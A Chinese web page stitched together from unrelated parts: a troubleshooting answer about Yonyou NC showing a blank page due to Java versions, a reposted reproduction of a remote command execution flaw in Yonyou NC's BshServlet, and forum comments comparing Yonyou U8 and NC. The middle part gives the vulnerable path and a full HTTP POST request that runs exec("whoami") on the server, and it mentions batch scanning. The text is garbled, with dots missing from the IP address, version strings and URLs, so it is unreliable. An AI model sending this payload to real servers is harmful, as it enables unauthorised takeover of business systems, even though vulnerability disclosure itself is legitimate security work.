用友NC打开后空白，设置IE、重装java，什么办法都试了，都没用，求大神

目前java已经更新到很新的，NC5产品基于的java是比较早的版本，请注意不要更新java版本，在java设置里面可以设置不更新，默认是自动更新。

问题解决方式：

1、卸载本机所有的java，通过360等软件彻底清除java残留后，重启电脑，直接打开浏览器登录地址，系统会自动提示下载java，该java是通过NC服务器上下载的，默认比较匹配的版本。

2、通过同事、网站、用友运维等途径，获取一个比较早的java版本，一般都会有留存。

3、通过下载服务器的客户端，安装客户端后，登录软件不会出现该问题。

3、通过用友体系，获取一个NC65版本软件的uclient，该插件是目前实施顾问比较喜欢的。该插件可以完美兼容多个不同版本的服务器登录（直接下载对应网址的服务器java）。

X友 NC 远程命令执行

一、漏洞简介

用友NC是一款企业级管理软件，在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。

用友NC存在反序列化漏洞，攻击者通过构造特定的HTTP请求，可以在目标服务器上远程执行任意命令。（用友 NC bshservletBshServlet 存在远程命令执行漏洞，通过BeanShell 执行远程命令获取服务器权限。）

二、漏洞影响

用友NC 全版本

三、漏洞复现

主页样式

漏洞url：

/servlet/~ic/bshservletBshServlet

访问执行：

exec("whoami");

详细数据包：

POST /servlet/~ic/bshservletBshServlet

host: 127001:8080

user-agent: Mozilla/50 (Windows; U; Windows NT 61; en-US) AppleWebKit/5343 (KHTML, like Gecko) Chrome/6047233 Safari/5343 SE 2X MetaSr 10

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

bshscript=exec("whoami");

简单批量一下

四、修复建议

1、用友NC为商业软件，可直接联系用友官方获得安全升级方案。

2、在官方安全补丁发布之前，建议相关企业严格限制用友NC的访问权限，禁止外部IP请求用友NC应用。

参考：

https://blogcsdnnet/weixin_45728976/article/details/106560286

http://wikipeiqitech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20bshservletBshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9Ehtmlh=%E7%94%A8%E5%8F%8B%20NC%20bshservletBshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E

往期用友漏洞：

用友GRP-u8 注入-RCE漏洞复现

注意：⚠️

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上，与你并肩前行！！！！

用友U8系列，使用局域网，服务器视并发访问数量选择，一般几十个人并发的，选择很普通的服务器就行，一般采用微软server版操作系统，客户端安装软件，要求也是windows系统，对版本要求不高

用友NC系列，基于互联网，服务器建议采用小型机，数据库一般是orical，客户端因为使用浏览器访问，对操作系统没有严格要求

至于你说的域管理，是方便局域网管理的一种模式，因为ERP系统采用用户口令方式登录，对管理模式没有要求。

用友NC是用友公司开发的最新的财务软件，是U8的下一代产品，适用于大中型集团公司的财务核算，我们公司就在用，比U8的功能强大许多，也繁琐了不少，不过用习惯了，还是很不错的，不过很贵啊，连服务器带软件下来要4-5百万。